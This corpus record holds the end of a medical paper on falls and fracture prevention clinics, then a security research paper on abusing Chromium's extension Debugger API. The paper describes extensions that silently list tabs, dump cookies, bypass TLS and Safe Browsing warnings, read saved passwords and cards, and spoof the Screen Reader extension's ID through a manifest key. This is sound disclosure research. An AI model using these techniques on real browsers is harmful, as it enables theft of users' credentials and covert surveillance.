Colombia, the falls clinic prioritized gentle balance exercise interventions at home due to the fact that despite 98% of Colombian older adults know about the benefits of exercise only 5% exercise every day. 30 Nevertheless, despite each clinic prioritizes a particular intervention for their target population, the whole comprehensive approach used at both settings is similar ( Figure 1) and includes balance exercise, patient education, nutritional supplements, medication review, hearing and vision correction, and home modification. Overall, these evidence-based multifactorial interventions 31 should constitute the key elements of any secondary prevention program for falls in older persons.
In terms of integrating the fracture prevention component, at the Australian clinic, fragility fracture risk is evaluated by clear identification of risk factors for fractures, quantification of absolute risk of fracture using FRAX (a fracture risk assessment tool that is not widely used in Colombia), and by bone mineral density measurement. Fracture risk assessment is followed by fracture prevention submit your manuscript | www.dovepress.com Dovepress Dovepress interventions such as osteoporosis treatment, calcium and vitamin D supplementation, and identification and treatment of secondary causes of bone loss.
Taken together, both programs are using a similar approach to two very prevalent problems in older people. However, components of the suggested models of NICE 22 and ACOVE 23 that are considered the optimal practice for falls and fractures prevention are at different degrees of implementation in both countries. Nevertheless, a common evaluation of the processes at both clinics allows a comprehensive revision of the processes and assessment tools and could constitute an initial step to developing an integrated model of secondary prevention of falls and fractures that could be implemented in both developed and developing countries worldwide. Based on this comparison, the authors propose that falls clinic services should be operationally linked to osteoporosis services as a "falls and fracture prevention clinic," which would facilitate a comprehensive intervention to prevent falls and fractures in older persons. Finally, more intensive studies are needed to gain a better understanding of how falls and fractures clinics operate and to identify more precisely their benefits and limitations. Finally, further evaluation with a randomized controlled trial is required to confirm the effectiveness and cost-effectiveness of this model of care. | 2016-05-12T22:15:10.714Z | 2013-01-20T00:00:00.000 | {
"year": 2013,
"sha1": "ec835e699e5b45e5dbad7a4ec6557f83d5d0d9b3",
"oa_license": "CCBYNC",
"oa_url": "https://doi.org/10.2147/cia.s40221",
"oa_status": "GOLD",
"pdf_src": "PubMedCentral",
"pdf_hash": "ec835e699e5b45e5dbad7a4ec6557f83d5d0d9b3",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
258823175 | pes2o/s2orc | v3-fos-license | Chrowned by an Extension: Abusing the Chrome DevTools Protocol through the Debugger API
The Chromium open-source project has become a fundamental piece of the Web as we know it today, with multiple vendors offering browsers based on its codebase. One of its most popular features is the possibility of altering or enhancing the browser functionality through third-party programs known as browser extensions. Extensions have access to a wide range of capabilities through the use of APIs exposed by Chromium. The Debugger API -- arguably the most powerful of such APIs -- allows extensions to use the Chrome DevTools Protocol (CDP), a capability-rich tool for debugging and instrumenting the browser. In this paper, we describe several vulnerabilities present in the Debugger API and in the granting of capabilities to extensions that can be used by an attacker to take control of the browser, escalate privileges, and break context isolation. We demonstrate their impact by introducing six attacks that allow an attacker to steal user information, monitor network traffic, modify site permissions (\eg access to camera or microphone), bypass security interstitials without user intervention, and change the browser settings. Our attacks work in all major Chromium-based browsers as they are rooted at the core of the Chromium project. We reported our findings to the Chromium Development Team, who already fixed some of them and are currently working on fixing the remaining ones. We conclude by discussing how questionable design decisions, lack of public specifications, and an overpowered Debugger API have contributed to enabling these attacks, and propose mitigations.
Introduction
Modern browsers expose powerful APIs [25], [36] to enable the development of third-party browser extensions [35], [54]. These are small programs, built and released by third-party developers, that extend or enhance the default features offered by the browser like cookie management and ad-blocking. Because of their potential for abuse, these APIs are permission-protected and not all of them are automatically granted by default to extensions [25]. In the case of Chromium, its permission system is quite limited and does not offer a comprehensive set of protections as implemented, for example, in Android [4]. Anecdotal evidence has already shown how these APIs have been abused for nefarious purposes [5], [17].
One overlooked Chromium feature is the debugger permission [37], which grants access to a limited version of the powerful Chrome DevTools Protocol (CDP), a core Chromium component for debugging and instrumenting the browser through a command passing interface. CDP is widely used for running End-to-End (E2E) tests on webbased applications through popular tools like Selenium, Puppeteer and Playwright, and for building crawlers. CDP exposes a WebSocket server to which external applications can connect to. Chromium extensions may also communicate with this component using the Debugger API, which is protected by the debugger permission. The Debugger API is a general substitute of virtually any other extension API as it grants total control over tabs, windows and critical browser resources. These powerful capabilities are expected to be found in a debugging tool, but are also an obvious candidate for abuse if they are insecurely exposed to potentially malicious actors.
Despite the risks of granting third-party extensions access to such a powerful component, no previous work has systematically analyzed the robustness of the Debugger API implementation and its security implications. In fact, Chromium's Debugger API is already being used by at least 434 extensions published on the Chrome Web Store according to a permission measurement that we performed in June 2022. Furthermore, no official specification detailing the design and purposes of this component can be publicly found. In this paper, we describe the results of a systematic security analysis done over the Debugger API and related components in the Chromium codebase. Our analysis focuses on finding violations of a set of security requirements that we derive from Chromium's CRX API Security Checklist [13]. Through a systematic code review, we find multiple vulnerabilities that can be exploited by a third-party extension to (i) circumvent the permission model to elevate privileges and gain control over more capabilities than expected, including key browser features; and (ii) break the isolation principles implemented by Chromium to prevent an attacker from accessing thirdparty targets. Specifically, we present the following six attacks: • Listing active targets ( §4.1). This is a privacy attack that can be used to track the list of active running extensions and user's browsing history, including URLs visited in an incognito window.
• Running on regular tabs ( §4.2). This attack allows an extension to steal any user information contained inside most browser tabs, including those in an incognito window, and evaluate arbitrary code inside them to alter their behavior.
• Running on security interstitial tabs ( §4.3). We show how extensions can abuse the Debugger API to modify the contents of interstitial messages, including critical security messages such as TLS error dialogs. It also can be used to skip interstitials completely with no user interaction.
• Running on WebUI tabs ( §4.4). This attack extends the capabilities of the second attack ( §4.2). It allows extensions to run on internal tabs (e.g., settings page), thus allowing the modification of critical browser settings, including security ones.
• Running on other extensions ( §4.5). This attack allows extensions to debug any other running extension to steal sensitive information (such as plaintext passwords and credit card details stored in password managers) or modify its normal operation (e.g., change the receiving wallet of a cryptocurrency transaction).
• Attaching to the browser target ( §4.6). This attack interacts with a special high-privileged target from the CDP that allows it to run on virtually any tab or extension and take full control of the browser.
We confirm the feasibility of the proposed attacks on every major Chromium-based browser, including more privacy-focused solutions like Brave and Ungoogled Chromium. All of our attacks share the same root cause, which we attribute to a mix of questionable design decisions and excessive functionality granted to extensions through CDP and the debugger permission. Overall, our attacks exemplify the inherent tensions when reconciling a debugging tool, which by definition has powerful capabilities, with an API exposed to untrusted third-party code. This is a challenging design area and we discuss the causes, impact, and potential mitigations in §5.
Disclosure. We disclosed all our findings to the Chromium Development Team along with a practical Proof-of-Concept for each attack. The attack from §4.1 and the vulnerable behavior from §4.2 were reported on March 2022 1 and acknowledged to be a bug by Google. It was fixed in May 2022, when it landed in Chromium Stable 102. The attack from §4.3 was reported on November 2021 2 and was fixed in Chromium Stable 103, 3 when it was assigned CVE-2022-2164. The attack from §4.4 was reported on December 2021, 4 marked as a duplicate and merged with §4.5. As far as we know, this is the only bug that was previously known by the Chromium Team. The attack from §4.5 was reported on December 2021 5 and is still awaiting a fix from the Chromium Development Team. The attack from §4.6 was reported on December 2021 6 and again for a different vulnerability on March 2022. 7 The first report was marked as duplicated and merged with §4.5. The second report, while initially flagged as a "high-severity bug," was then classified as "not-a-security-bug." We discuss this point in detail in §5.
Research artifacts. Proof-of-Concepts for all our attacks are available at https://github.com/josemmo/chrowned. All of them use the Manifest V3 specification to account for the approaching phase out of Manifest V2 [39].
Background
Chromium is an open-source web browser project mostly developed and maintained by Google. Its codebase is the foundation for the Google Chrome browser, and it is widely reused by many other popular browsers, including Microsoft Edge, Brave, Samsung Internet or Opera. This section provides technical background on Chromium extensions ( §2.1), the Chrome DevTools Protocol ( §2.2), and Chromium's Debugger API ( §2.3).
Chromium Extensions
Chromium extensions are programs consisting of a set of files and assets similar to those found in traditional web applications. They are typically packaged into a custom file format known as "CRX" and then submitted to the Chrome Web Store-the official distribution platform from Google-for distribution. CRX packages are signed by extension developers using public-key cryptography to provide integrity and authenticity. As §3 explains, extensions can also be distributed outside the Chrome Web Store without the need for signatures through sideloading (e.g., using ZIP archives).
Extensions must have a mandatory JSON file named manifest.json. The manifest file contains basic metadata about the extension (e.g., name, version) and other properties, such as a background script (for running tasks or receiving events independently of any opened tab) and content scripts (for injecting code onto pages that match a given URL).
Chromium implements several security features to protect its users from malicious extensions. One of such features is isolation, which prevent websites and extensions alike from running code on other execution contexts outside their scope. Additionally, extensions must declare permissions in their manifest file to access sensitive resources (like the browsing history) or break isolation and run on tabs with a given URL (i.e., through the use of host permissions). Some permissions are considered more dangerous than others because of the potential harm that their abuse or misuse can cause to users. For this reason, an extension containing one or more of these permissions will display a prompt during install with brief warnings for each of them [27].
Chromium's permission model still presents important shortcomings, many of which have already been fixed on platforms like Android [4]. For example, once an extension is installed, it keeps unrestricted access to all declared permissions and there is no simple way to revoke access afterwards. Another limitation is transparency: the user warnings shown in the install dialog communicate what a permission enables at a technical level but it does not clearly convey how impactful it can be for users' privacy and security if abused.
Chrome DevTools Protocol
Chromium has a built-in component known as the Chrome DevTools Protocol (CDP) [29] which allows web developers to instrument and debug the browser to the fullest extent. Although this feature can be abused as we demonstrate in this paper, it offers useful features for software developers and researchers. Selenium [69], Puppeteer [51] and Playwright [24] are three tools powered by CDP which are widely used for End-to-End (E2E) testing of web applications or automating web scraping.
Any application using the CDP communicates with the browser by sending JSON-encoded messages to a Web-Socket endpoint hosted by the Chromium process, which is also used to receive events triggered by the browser. For security and performance reasons, this endpoint has to be enabled by adding the --remote-debugging-port command line flag when launching the browser, followed by the port number the CDP server will be bound to (port 9222 by convention) [29].
The Chrome DevTools UI [8] uses the CDP under the hood to inspect and debug a target (e.g., a tab). Messages exchanged by the browser (host) and the DevTools UI (client) can too be inspected using the "Protocol monitor" drawer tab (see Figure 1). This feature is initially turned off but it can be manually enabled from the "Experiments" section in the DevTools UI settings menu.
To account for the isolation between tabs, background pages, service workers, and other worlds from the browser, CDP introduces the concept of target, which can be any of the former. When a client wants to interact with a target, it first has to attach to it using the Target. attachToTarget command. It will then receive a session ID to forward CDP commands to the desired target. This ensures that, for example, if we want to evaluate JavaScript code on a particular tab, it will get executed only on our target and nowhere else. By default, when opening a WebSocket to the CDP server, the client attaches to what is known as the browser target. This is a special type of target that can list targets (i.e., Target. getTargets), attach to active ones and perform other instrumentation actions affecting the entire browser.
The number of capabilities the protocol offers varies from version to version. In a nutshell, the CDP can perform virtually any action a user will be able to achieve with manual interaction (e.g., clicking on a link or button). Additionally, it gives finer control over browser internals [7]. While most of these capabilities are truly sensitive, this is expected from a development and debugging tool, and is not necessarily concerning by itself. However, carelessly exposing these capabilities to other parts of the browser (e.g., websites, extensions) might be a source of vulnerabilities.
The Debugger extension API
Extensions cannot control the command line arguments the browser has been launched with, which is a necessary step to activate the CDP WebSocket endpoint ( §2.2). Yet, extensions can still communicate with a version of the CDP with limited capabilities through the use of the Debugger API [37], which is a substitute for virtually any other extension API: by just requesting the debugger permission, extensions can perform a wide range of sensitive actions ( §2.2) without having to declare any further permissions in the manifest. In addition, it gives extensions access to exclusive functionality (i.e., that no other extension API offers). Table 1 provides a list of noteworthy Debugger API features alongside their counterparts using other extension APIs, if any.
The Debugger API differs from the regular CDP in that it makes critical protocol domains inaccessible. For example, the Target domain or even some cherry-picked methods from other partially allowed domains. The rationale behind this decision is presumably to prevent a rogue extension from taking full control of the browser. We note that having a fully instrumented environment is ideal when running E2E tests but it is a dangerous feature for an end-user to have enabled, thus the need for a limited CDP agent for extensions. Given these limitations (mainly the absence of the Target domain), an alternate API to list targets and attach to them is needed. Therefore, the Debugger API provides JavaScript bindings to perform these operations. In short, an extension has to follow three steps to instrument a target: 1) List all active targets with chrome.
debugger.getTargets() to get the target, tab or extension ID of the one that will be instrumented. 2) Call chrome.debugger.attach() to attach to the desired target. Immediately after attaching, the browser will start showing a notification to inform the user of this event. 3) Use chrome.debugger.sendCommand() to send CDP commands to the debugged target and, optionally, add a listener to chrome. debugger.onEvent to be notified of CDP events.
The Debugger API imposes limitations on what targets an extension can attach to. While an extension can debug itself, it cannot instrument service workers, background pages or tabs from other extensions, nor it can attach to targets with a URL scheme other than "http://" or "https://". We explore ways of bypassing these security mechanisms in §4.
User awareness. When a debugging extension successfully attaches to a target, Chromium notifies users by rendering an infobar across all open browser tabs [74] as shown in Figure 2. 8 This notification will not go away until there are no attached debuggers left. Optionally, a user can click on the cancel button to force all debuggers from an extension to be detached from their respective targets. However, nothing prevents a malicious extension from reattaching to the previous targets immediately after the user cancels the infobar, and this can happen without any user awareness ( §4.2).
Threat model
Our fist threat model, named Threat Model A (TMA), assumes an attacker who can successfully trick a user into installing a malicious extension that declares the debugger permission, thus getting access to the capabilities described in §2.2. This extension may be distributed through official platforms such as the Chrome Web Store 8. We note that debugger infobars can be completely disabled if Chromium is launched with the command line flag --silent-debugger-extension-api.
in the form of a signed CRX package [61]. Attacks §4.1 and §4.2 assume this threat model.
A second more restrictive threat model, named Threat Model B (TMB), requires users to install extensions through sideloading. Sideloading consists in loading an unpacked extension [31], or drag-and-dropping a CRX package or ZIP file over the extensions management page (i.e., chrome://extensions). Because unpacked extensions and ZIP archives lack the cryptographic signature that CRX files have, their contents are not integrityprotected nor their authenticity can be verified. Therefore, they can spoof their ID and impersonate other legitimate extensions. We introduce that feature in §4.4). However, as they are not CRX packages, they cannot be distributed through the official Chrome Web Store. Attacks §4.4, §4.5 and §4.6 use Threat Model B.
We note that sideloading is a feature intended for developers so it requires users to enable "Developer Mode" on their browsers for it to work. However, malicious actors can easily trick users into doing so or even silently run a malicious PowerShell script that automates this process, a technique that has already been observed in the wild [18], [65]. A threat actor that gains execution capabilities outside the browser on a victim's device might prefer sideloading an extension over dropping an executable for ease of development and feature set completeness. Browser extensions that work across different operating systems are easy to develop, and the Debugger API lets attackers evaluate arbitrary JS code and intercept network traffic in cleartext without the hassle of setting up a proxy with a trusted self-signed certificate.
Although TMB is a more restrictive threat model, it is widely accepted as realistic by the community. For example, most numbered vulnerabilities (CVEs) involving a malicious extension assume exactly this model (e.g., [55]-[59]), and it is also found in previous academic works studying malicious browser extensions [20], [45]. Furthermore, sideloading is a common practice to install extensions in regions where the Chrome Web Store is not available and alternative marketplaces have emerged [1]- [3]. One notable example is China. There, sideloading is the only way to install an extension because the Chrome Web Store is not available despite Google Chrome having the largest browser market share [73].
Attacks
We next introduce six attacks that exploit design vulnerabilities in the Debugger API and in the logic for granting restricted capabilities to highly privileged extensions. Attacks are grouped by threat model (first TMA, then TMB) and sorted by severity in ascending order.
Methodology. We performed a systematic manual code review process to find issues in the design and implementation of the Debugger API. To assess its security, we defined a set of security requirements that an hypothetically secure extension API must comply with based on the official CRX API Security Checklist [13]. This is a public document used by Chromium developers as a baseline to follow best security practices [12].
To do so, we systematically review the JavaScript bindings exposed by the chrome.debugger ob- ject [14]. For each binding, we flag its source code and that of the browser components it depends on. Then, we thoroughly inspect the tainted source code to find violations of the following requirements: • SR01 -User Awareness. Users must be clearly informed of the implications of an extension making use of the Debugger API (e.g., during installation) and notified when an extension is actively using it (e.g., using infobars).
• SR02 -Isolation. The Debugger API must respect browser profiles and honor users' privacy choices (e.g., incognito mode) and restrict the scope of extensions using it accordingly.
• SR03 -Access Control. The Debugger API must enforce rules to prevent extensions from accessing sensitive resources (e.g., browsing history) or targets (e.g., tabs) outside their supposed reach.
• SR04 -Spoofing Avoidance. Extensions should not be able to modify critical parts of the browser UI (e.g., settings page) to stop them from misleading users into performing a given action.
To identify such violations, we looked for security checks or preconditions that the Debugger API should comply with. For instance, to satisfy SR01, a call to display an infobar with a localized message is likely expected when an extension attaches to a target. Once a requirement violation is found, we manually verified its potential exploitability by implementing a prototype extension and testing its effectiveness against the latest Chromium Stable release at the time. Table 2 summarizes the attacks that we found using this methodology and their impact, and Table 3 shows violations of the above Security Requirements for each attack. The order in which we introduce the attacks goes from the least to the most impactful, starting from merely listing the opened tabs and running extensions ( §4.1), then gaining access to evaluate arbitrary code on each of those targets ( §4.2, §4.3, §4.4, §4.5), and finally being able to take control of the browser ( §4.6). Note that some of our attacks achieve similar results. We include them nonetheless as they are independent from one another (i.e., they are based on different flaws, thus mitigating one attack will not affect the other).
Prevalence. We are able to reproduce our attacks in all major Chromium-based browsers (Google Chrome, Mi- ✗ Denotes a violation of a security requirement. ✗ ‡ Only a violation if infobars have been disabled. crosoft Edge, Opera and Vivaldi), including those with a special focus on privacy (Brave browser and Ungoogled Chromium [22]). We note that we have not tested these attacks on mobile versions of Chromium (e.g., Google Chrome for Android) as there is no straightforward way of installing extensions in those builds as of this writing. We provide Proofs-of-Concept (PoCs) for all of the attacks in the artifacts associated with this paper for independent validation. These PoCs are fully-commented extensions based on our threat model. They showcase various realworld scenarios that make use of our findings.
Listing active targets
The Debugger API is implemented in such a way that extensions have to call the chrome.debugger. attach() function to start instrumenting a particular target using the CDP (see §2.3). To indicate the target, its target ID must be passed as a parameter to this function. Yet, extensions can extract a list of running target IDs by calling chrome.debugger.getTargets().
Attack
vector.
The chrome.debugger. getTargets() function lists not only the targets an extension is allowed to attach to (usually tabs with a URL beginning with "http://" or "https://"), but also other targets the extension is not supposed to be capable of debugging. Any extension declaring the debugger permission in its manifest can call this function from both content scripts and background pages without requiring any user interaction. This could result in a privacy abuse as it can expose sensitive data such as users' browsing history, thus violating SR03. Being able to access this type of sensitive information raises privacy concerns as it could be linked to user identities (e.g., by also harvesting cookies or other Personal Identifiable Information).
Impact. Alongside the target ID, the Debugger API also grants access to the URL of the target, the page title and even the favicon URL. A malicious extension can call chrome.debugger.getTargets() to easily and accurately monitor the set of opened tabs and the list of websites visited by the user, including those from incognito windows. Note that the malicious extension does not need to be granted permission to run in the former context, thus breaking SR02. Additionally, because service workers and background pages are also listed, an attacker can also get the list of running extensions. 9 Access to installed extensions can be used for improving device fingerprinting techniques, as in some cases is enough to unequivocally identify a user [47], [68], [71]. Since there is no rate-limit to getting the list of targets, an attacker could keep polling this information every few seconds or less to detect changes in enabled extensions or page navigation events, as proposed in Listing 1. An important remark is that SR01 is also violated as no debugger infobar (see §2.3) is shown when calling the chrome. debugger.getTargets() method, thus making this attack fully silent. We provide a PoC within the artifacts to detect running extensions that solely uses the Debugger API.
Running on regular tabs
Regular tabs are the least privileged targets a CDP client can attach to. They use either the "http://" or "https://" scheme. We note that the "ftp://" scheme is unsupported since October 2021 [30], and "file://" is restricted by default and requires the user to manually opt in [26].
Attack vector. Instrumenting a regular tab is trivial. The extension only needs to declare the debugger permission in its manifest and then attach to the desired tab using its tab ID or target ID. Both IDs can be known with the methods described in §4.1. Once attached, CDP messages can be exchanged (see §2.3) as long as the extension does not get detached from the target, which can happen programmatically by purposely calling chrome. debugger.detach(), or when the tab is closed or changes the URL to a restricted page (i.e., outside the scope of regular tabs). Because there is no finer control over this API, an extension with the debugger permission will have unrestricted access to the Debugger API in its entirety. This breaks SR03 as it can be abused to access sensitive resources that otherwise would require additional permissions (e.g., the browser cookie store).
After attaching to a target, an infobar is shown to the user giving the option to force-detach the debugging extension ( §2.3). However, during our research we find that extensions can reattach immediately afterwards and that no rate-limit protection exists against this behavior. In practice, to the user this would look like the cancel button of an infobar does nothing, rendering it ineffective due to the immediacy at which extensions can re-attach. In addition, due to an incomplete security check, an extension can also attach to regular tabs from incognito windows, even when it has not been granted permission to do so, which is the default behavior. While trying to attach to an incognito tab by providing the tab ID will result in a "No tab with given id" error, no additional input verification is performed when we use its target ID, thus letting the extension debug tabs from incognito windows and violating SR02.
Impact. As mentioned in §2.3, the Debugger API is a general substitute for virtually any other extension API.
In an nutshell, with this API, a malicious extension can: • Steal sensitive user information. By being able to manipulate the DOM or evaluate arbitrary JavaScript expressions, the extension can read email addresses, passwords, credit card numbers and other Personal Identifiable Information (PII) already accessible to the regular tab. It is also possible to monitor all network traffic sent by the regular tab to which the extension is attached to for the same purpose. Additionally, the Network. getAllCookies command lets extensions exfiltrate any cookie stored in the browser regardless of the URL of the debugged regular tab, thus providing a historical perspective of users' browsing habits and even leaking sensitive data encoded in the cookies as Listing 2 shows.
• Manipulate runtime behavior. Apart from stealing data, evaluating arbitrary code on regular tabs is also useful for modifying the UI of a web application or changing its intended behavior. For instance, an attacker may inject a JavaScript file on a banking app to alter the recipient of a wire transfer while hiding this information from the user.
• Modify site permissions. The Browser. grantPermissions command can grant any site access to privacy-sensitive resources (e.g., microphone) without further user consent, bypassing the need for additional permission in an extension's manifest.
We verify the previous capabilities by creating several extensions that use the Debugger API to achieve different goals. As a PoC, we provide an extension that attaches to tabs from incognito windows, and another one that list the metadata for all cookies stored in the browser.
Running on security interstitial tabs
Chromium comes with a built-in security feature known as Safe Browsing for blocking known phishing and malware sites [63]. When users enable this feature, the browser will block navigation to URLs included in a blocklist and instead display an interstitial dialog asking the user to confirm a dangerous action (e.g., continue anyway and visit the site) or abort and go back to the previous page. Interstitials are also used for showing SSL/TLS warnings like an expired or invalid certificate as shown in Figure 3, or when connecting to a public network behind a Captive Portal, among other use cases.
Attack vector. Given the sensitive nature of interstitials, these "loud" dialogs are always served by Chromium at chrome-error://chromewebdata/, which is a special unreachable URL (i.e., it cannot be visited by typing it on the browser's address bar).
Serving such interstitials like so presents a security advantage: because the target is no longer a regular tab (i.e., it has a different scheme), extensions cannot theoretically run on it, thus preventing a malicious actor from, for instance, using the scripting extension API to evaluate arbitrary JavaScript code on the page. However, this restriction does not apply to the Debugger API, which can attach to targets with the former unreachable URL. This lack of access control to such a sensitive class of resources enables several attacks that can impersonate or modify a security interstitial.
Impact. Given that extensions can use the Debugger API to attach to a security interstitial tab, an attacker can use this capability to: Figure 4. An impersonated security interstitial used to trick the user into downloading a malicious executable under the pretext that a browser update is needed.
• Impersonate interstitials. Extensions can evaluate arbitrary code to modify the appearance of these notifications to show a different message or content, therefore modifying the browser UI and violating SR04. Performing this attack is as trivial as querying the DOM nodes we want to modify (e.g., using document.querySelector) and then changing their HTML or text contents. A clear malicious use case for this is a phishing attack, given that it can produce an interstitial with the same look and feel of the ones triggered by Chromium to trick the user into performing some dangerous action, like downloading an executable as Figure 4 shows.
• Skip interstitials. An attacker can also force the browser to automatically skip interstitials on some websites by making the extension programmatically click on the "Proceed" button or calling certificateErrorPageController. proceed(). This could be used by a malicious extension to skip TLS warnings or error messages (e.g., related to certificate validation), which can facilitate TLS man-in-the-middle (MITM) attacks using forged certificates. The same strategy can be applied to sideload malware by skipping Safe Browsing.
To demonstrate this attack, we created a PoC extension that automatically bypasses security interstitials whenever it encounters one.
Running on WebUI tabs
A vast portion of the User Interface (UI) in Chromium is implemented using web pages. A well-known case are, for example, the browser settings, which can be accessed by navigating to the chrome://settings URL. There are well over 70 different URLs using the internal "chrome://" scheme, ranging from the bookmarks menu to the browsing history. Google calls these Chrome UI or WebUI pages [77]. An almost complete list of WebUI URLs can be found on chrome://about. These pages run in a higher-privileged context with more capabilities than regular tabs, which are provided through (i) internal extension APIs that are granted based on the URL; and (ii) message passing communication using Mojo JavaScript bindings [76]. For example, the chrome://extensions page, responsible for letting the user manage the installed browser extensions, has access to an internal extension API (i.e., developerPrivate) for that very purpose.
For obvious reasons, extensions cannot run on WebUI pages as that would have devastating consequences for the browser's security model. However, on March 2013 the experimental flag extensions-on-chrome-urls was added to Chromium to circumvent this limitation and allow extensions that explicitly declared the chrome:/ / * permission to access WebUI pages [9]. Later on, in 2018, a security report flagging this issue triggered a response from the Chromium Security Team [43] that limited the capabilities of the flag by blocking extensions using the Debugger API from attaching to WebUI targets regardless of the value of the previous flag as Listing 3 shows.
Attack vector. Not being able to use the Debugger API does not imply that extensions cannot run on WebUI tabs. An extension can still use the tabs or scripting APIs to evaluate JavaScript expressions when the previous flag is enabled. In fact, the official "Screen Reader" extension [34] has access to the "chrome://" scheme without needing it to be enabled at all. This extension is an accessibility tool targeted towards users with visual impairments that can read aloud the contents, buttons, menus and other elements of a page. We find other instances of security concessions made in favor of usability in platforms such as Android, where it has proven to be abusable by attackers [21], [44]. Because a significant part of the browser UI is implemented using web pages, the extension has to be able to interact with WebUI tabs too to read its contents. To accomplish it, the Chromium developers made an exception for this particular extension and granted it privileges to run on the former higherprivileged targets without requiring any further flags.
This backdoor access is implemented by defining an allowlist solely containing the Screen Reader extension ID, which is queried every time an extension wants to run on a given URL to determine if it is restricted or not (see Listing 4).
Using a hardcoded allowlist for this purpose is not a robust nor secure design choice as the ID of an extension can be impersonated. A clone extension with the same ID as the Screen Reader extension can take advantage of its privileged position within the browser and acquire its additional capabilities. Unfortunately, this is rather trivial to perform. Figure 5 shows how Chromium calculates extension IDs by taking a DER-encoded RSA public key and producing a SHA-256 digest of its bytes, with the added distinction that the output hash in hexadecimal form uses an "a" to "p" alphabet instead of the standard "0-9" and "a-f". This digest is then cropped to return only the first 32 characters [79]. To get this public key for the ID generation, the browser looks at the header of the extension's signed CRX package it came in and additionally performs an integrity check against its signature [61]. However, if the extension is sideloaded from a local directory (unpacked extension) or a ZIP archive instead of using a CRX package (e.g., downloaded from the Chrome Web Store), this public key information is not available. In those cases, the ID is derived from the absolute path the extension was loaded from unless there is a key property in the extension's manifest.json file (see Listing 5). If the property exists, whatever value it has will be used as the extension's Base64-encoded public key [28], thus making it possible to produce clone extensions.
Clone extensions have some limitations. Without the private key of the impersonated extension, we cannot produce a valid signed CRX package and upload it to the Chrome Web Store. Therefore, the easiest alternate distribution method is to create a ZIP archive of the clone extension and convince the user to enable Developer Mode and then drag-and-drop the ZIP file over the chrome:/ /extensions page to install it. This is one way of { "manifest_version": 3, "name": "Clone extension", "version": "0.0.1", "key": "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEGB i/oD7Yl/Y16w3+gee/95/EUpRZ2U6c+8orV5ei+3CRsBsoXI /DPGBauZ3rWQ47aQnfoG00sXigFdJA2NhNK9OgmRA2evnsRR bjYm2BG1twpaLsgQPPus3PyczbDCvhFu8k24wzFyEtxLrfxA GBseBPb9QrCz7B4k2QgxD/CwIDAQAB" } Listing 5. Sample manifest impersonating the Screen Reader extension. sideloading extensions into Chromium and, as discussed in §3, it is a usual threat model for malicious extensions.
Impact. Allowing extensions to run arbitrary code on WebUI pages violates both SR03 and SR04 because these pages have access to sensitive resources (e.g., browsing history) and control parts of the browser UI. Some applications of this attack include: • Modify browser settings. A clone extension can evaluate JavaScript on the chrome:// settings page to read or tamper with the browser settings. This can be done without user interaction.
• Steal passwords and credit cards. Chromium comes with a built-in password and payment methods manager. Because plain text passwords and credit card details are accessible through the settings page, an attacker can obtain this information in plain text. 10 • Read GAIA ID. Every Google account is identified by a unique Google Accounts and ID Administration ID, or GAIA ID for short [41]. This identifier is stored by the browser when a Google account has logged in and can be leaked from the chrome://signin-internals/ page.
• Modify browser flags. Some browser settings (like the flag mentioned in this section) are not intended to be changed by regular users because of security reasons. However, since these are listed on chrome://flags, they can be arbitarily changed by a malicious extension.
• List omnibox predictors. To provide relevant autocomplete suggestions, Chromium keeps track 10. In some Operating Systems like Windows, Chromium stores passwords encrypted with the logged user credentials. For this reason, leaking passwords might require users to authenticate themselves to proceed. locally of all text typed into the search bar (i.e., omnibox [75]). The page chrome:// predictors/ exposes this data as a WebUI tab, making it accessible to an attacker.
Our PoC demonstrates how this attack allows obtaining the details of payment methods found in chrome:/ /settings/payments, one of the browser's settings pages.
Running on other extensions
Similar to WebUI pages, which are served from the privileged "chrome://" scheme, extensions also run in a restricted environment, each having their own dedicated base URL in the form of chrome-extension:// <extension-id>. In practice, this implies that an extension can access any assets and run on targets belonging to its base URL (like its background page or service worker), but it is not allowed to do the same with other extensions. Despite running in isolation from each other, extensions can communicate with other extensions, tabs and background scripts through message passing [32]. While message communication can be used to evaluate code on a vulnerable target [23], extensions can never directly run on a third-party extension using browser extension APIs like they can with regular tabs.
Attack vector. The same experimental flag used in §4.4 to run on WebUI tabs grants access to the "chromeextension://" scheme (Listing 4). However, there is no way to declare a host permission with this scheme in the manifest file of an extension as that will throw a validation warning and the browser will ignore the permission altogether. A crucial aspect here is that, while most browser extension APIs, like tabs and scripting, will verify host permissions before running on a target, the Debugger API implicitly grants access to any URL an extension is authorized to access. For this reason, it only checks whether a URL is restricted or not by calling the PermissionsData::IsRestrictedUrl() method.
Because this method effectively considers a URL unrestricted when the extensions-on-chrome-urls flag is enabled, the Debugger API can be used to attach to any target from any extension. This can be used as an alternative exploitation method without requiring sideloading nor impersonating the Screen Reader extension using the technique described in §4.4.
Impact. A malicious extension exploiting this technique can attach to an existing legitimate extension to:
• Steal sensitive information. By attaching to another extension, an attacker can evaluate JavaScript code to steal passwords, PGP private keys or other sensitive information, hence breaking SR03. A clear target for this are password manager extensions.
• Manipulate the extension behavior. Similar to §4.2, debugging an extension can be used to change its appearance and behavior. This allows, for example, stealing funds by modifying the receiving address of a cryptocurrency transaction initiated with MetaMask [19]. This attack presents an interesting property that eases its distribution and amplifies its impact. In the past, there have been instances of legitimate extensions going rogue. One common cause is developers selling their published items to other companies that then push a malicious update to steal private user information. These extensions operate for a limited time on a trusted marketplace (e.g., the Chrome Web Store) before they get spotted and delisted from the market [64], [70]. Another popular approach to distribute malware is to publish a fake extension impersonating or cloning a legitimate one to trick a user into trusting the former [10]. This is accomplished either by having a very similar UI or just by building a modified version of the original extension with some patches applied to add the malicious functionality. The former approach has been seen in a recent operation attributed to North Korea that made the news in January 2022 [18]. The attack described in this section would not require repackaging fake extensions nor buying existing ones. Instead, an attacker just needs to distribute a malicious extension that will attach to as many legitimate targets (i.e., extensions) as needed to monitor and manipulate their behavior.
To demonstrate the stealing capabilities, we created a PoC extension that attaches to LastPass [48] and Mailvelope [52] extensions to steal passwords and PGP private keys, respectively.
Attaching to the browser target
We mentioned in §2.2 that extensions using the Debugger API are not supposed nor allowed to attach to the browser target. This is presumably to prevent a rogue extension from taking control of an end-user's browser. Since they cannot use the Target domain, extensions attach to targets using the chrome.debugger. attach() JavaScript binding provided by the Debugger API, which allows an extension to send CDP commands to, and only to, a given target. That is, if an extension wants to instrument two different tabs, it will need to attach to both of them separately. If it were to exist, a hypothetical extension with access to the browser target would be capable of instrumenting any tab or extension running in the browser as the Target CDP domain does not enforce further access control rules.
